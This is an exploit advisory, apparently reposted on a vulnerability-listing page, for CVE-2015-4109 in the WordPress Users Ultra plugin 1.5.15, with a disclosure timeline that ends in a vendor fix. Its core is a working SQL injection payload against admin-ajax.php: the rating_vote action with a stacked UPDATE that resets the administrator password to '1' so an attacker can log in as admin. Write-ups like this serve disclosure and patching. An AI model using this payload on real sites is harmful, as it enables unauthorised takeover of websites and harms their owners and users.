WordPress Users Ultra 1.5.15 SQL Injection

# Exploit Title: CVE-2015-4109 - WordPress Users Ultra Plugin [SQL injection]

# Date: 2015/05/30

# Exploit Author: Panagiotis Vagenas

# Contact: https://twitter.com/panVagenas

# Vendor Homepage: http://usersultra.com

# Software Link: https://wordpress.org/plugins/users-ultra/ # Version: 1.5.15 # Tested on: WordPress 4.2.2 # Category: webapps # CVE: CVE-2015-4109 One can perform an SQL injection attack simply by exploiting wp_ajax_nopriv_rating_vote action. POST parameters data_target and data_vote can be used to execute arbitrary SQL commands in the database. In the following PoC we change the administrators password to '1' so a malicious user can then login as the administrator, taking full control of the website. * Send a post request to `http://my.vulnerable.website.com/wp-admin/admin-ajax.php` with data: action=rating_vote&data_id=1 &data_target=user_id IN (1); UPDATE wp_users set user_pass=MD5(1) where ID &data_vote=1 * Login with administrator's user name and password '1' Note that we assume that table name prefix is 'wp' and administrators user id is 1, a very common scenario.

* Timeline 2015-05-29 Discovered 2015-05-30 Vendor notified via contact form 2015-06-01 Vendor notified via email 2015-06-02 Vendor notified via support forums at wordpress.org 2015-06-02 Vendor responded 2015-06-04 Fix released in version 1.5.16

Vulnerability Lab

WordPress Users Ultra 1.5.15 SQL Injection

Wordpress Really Simple Guest Post File Include

WordPress SEO by Yoast 2.1.1 - Authenticated Stored DOM XSS

WordPress 4.2 Stored XSS

Exchange ProxyLogon RCE Metasploit Exploit

WordPress RobotCPA Plugin V5 - Local File Inclusion

WordPress Users Ultra 1.5.15 SQL Injection

Join the conversation